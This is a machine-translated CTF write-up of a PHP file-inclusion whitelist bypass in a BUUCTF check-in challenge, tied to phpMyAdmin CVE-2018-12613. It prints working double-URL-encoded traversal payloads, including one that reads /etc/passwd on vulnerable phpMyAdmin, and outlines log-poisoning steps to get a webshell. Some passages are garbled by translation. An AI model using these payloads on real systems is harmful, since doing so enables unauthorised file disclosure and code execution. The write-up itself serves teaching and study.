File contains
Kongji, I first came into contact with this buuoj web check-in questions of
Enter the target and check the source code
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <!--source.php--> <br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body> </html>
Key points
Enter this php source
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; } ?>
Focus again
if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; } ?>
see
There's a train of thought.
As long as this judgment is used, the parameter file passed by the file will be executed, and any file will be included when possible.
When a file is imported, the user can control the referenced file name. Because the incoming file name has not been properly verified, or the verification has been bypassed, the unexpected file is operated, which may lead to unexpected file disclosure or even malicious code injection.
- Look at the judgment in if again, the file parameter is not empty & & it is a string & & it is checked by the checkfile method. Go to the checkfill method.
public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; }
Look, hint.php is on the white list!
$whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; }
Enter hint.php to see a prompt like this
flag not here, and flag in ffffllllaaaagggg
Looking back at the previous condition, first there must be a string
(the function must return true to access the file)
if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false;
Then judge whether the parameter is in the white list;
The function of mb_strpos() is to find the location of the first occurrence of a string in another string, that is? Position in previous string
mb_substr() is used to truncate the string.
Then compare it with the white list.
Repeat the above operation again.
This involves a hole in phpMyAdmin CVE-2018-12613. Because PHP will automatically urldecode once, when we submit% 253f (urlencode of urlencode), it will automatically convert to% 3F. if the condition is met,% 253f / will be considered as a directory, thus including. There is the following transformation
? --> %3f --> %253f
payload: file=hint.php%253f/.../.../.../.../.../.../.../ffffllllaaaagggg
About cve-2018-12613-PhpMyadmin stage contains
On June 19, 2018, phpmyadmin fixed a critical level vulnerability in the latest version
https://www.phpmyadmin.net/security/PMASA-2018-4/
The official vulnerability description is like this
An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
The problem is in index.php's 55-63:
// If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit; }
Here, there are 5 judgments about the parameters. You can Include files through Include if you pass the judgment.
The last two are the problems
$target_blacklist = array ( 'import.php', 'export.php' );
as well as
Core::checkPageValidity($_REQUEST['target']):
The code is 443-476 in librariesclassesCore.php
public static function checkPageValidity(&$page, array $whitelist = []) { if (empty($whitelist)) { $whitelist = self::$goto_whitelist; } if (! isset($page) || !is_string($page)) { return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } return false; }
Look, this is almost the same as the code above
Then the white list verified by Kangkang
public static $goto_whitelist = array( 'db_datadict.php', 'db_sql.php', 'db_events.php', 'db_export.php', 'db_importdocsql.php', 'db_multi_table_query.php', 'db_structure.php', 'db_import.php', 'db_operations.php', 'db_search.php', 'db_routines.php', 'export.php', 'import.php', 'index.php', 'pdf_pages.php', 'pdf_schema.php', 'server_binlog.php', 'server_collations.php', 'server_databases.php', 'server_engines.php', 'server_export.php', 'server_import.php', 'server_privileges.php', 'server_sql.php', 'server_status.php', 'server_status_advisor.php', 'server_status_monitor.php', 'server_status_queries.php', 'server_status_variables.php', 'server_variables.php', 'sql.php', 'tbl_addfield.php', 'tbl_change.php', 'tbl_create.php', 'tbl_import.php', 'tbl_indexes.php', 'tbl_sql.php', 'tbl_export.php', 'tbl_operations.php', 'tbl_structure.php', 'tbl_relation.php', 'tbl_replace.php', 'tbl_row_action.php', 'tbl_select.php', 'tbl_zoom_select.php', 'transformation_overview.php', 'transformation_wrapper.php', 'user_password.php', );
After that, phpMyAdmin's development team took into account the situation of adding parameters after target, took out the front part of the question mark through string segmentation, continued to match the white list, and then repeated the action after a urldecode.
Get payload
target=db_datadict.php%253f/../../../../../../../../etc/passwd
Here again, we will analyze the specific causes of the loopholes in the bullshit file
- Programmers usually write the reused function to a single file. When a function needs to be used, they call the file directly without writing it again. The process of file calling is generally called file containing.
- They want the code to be more flexible, so they set the included files as variables for dynamic calls,
- However, due to this flexibility, the client can call a malicious file, resulting in a File Inclusion Vulnerability.
- Almost all scripting languages provide the function of file inclusion, but File Inclusion vulnerabilities are mostly in PHP Web Application, but very few in JSP, ASP, program, or even none, which is the drawback of its own language design (guess
Getshell
- Upload picture GETshell
- Read file, read php file
- Include log file to get webshell
- First find the file location
Have permission to read apache configuration file or / etc/init.d/httpd
Default location / var / log / httpd / access ﹐ log
- Let the log file insert php code
When sending the url request, insert the php code. Generally, use the burp suite to grab the package and modify it
curl contract
Insert into get request or user agent section
- Include log files (must have permission to include)
Raise a chestnut.
if (isset($_GET[page])) { include $_GET[page]; } else { include "hint.PHP"; }
Where $_GET[page] allows the user to control variables. If there is no strict filtering, it will lead to loopholes
Code audit
Functions containing files
- include()
- include_once()
- require()
- require_once()
Reference link http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12613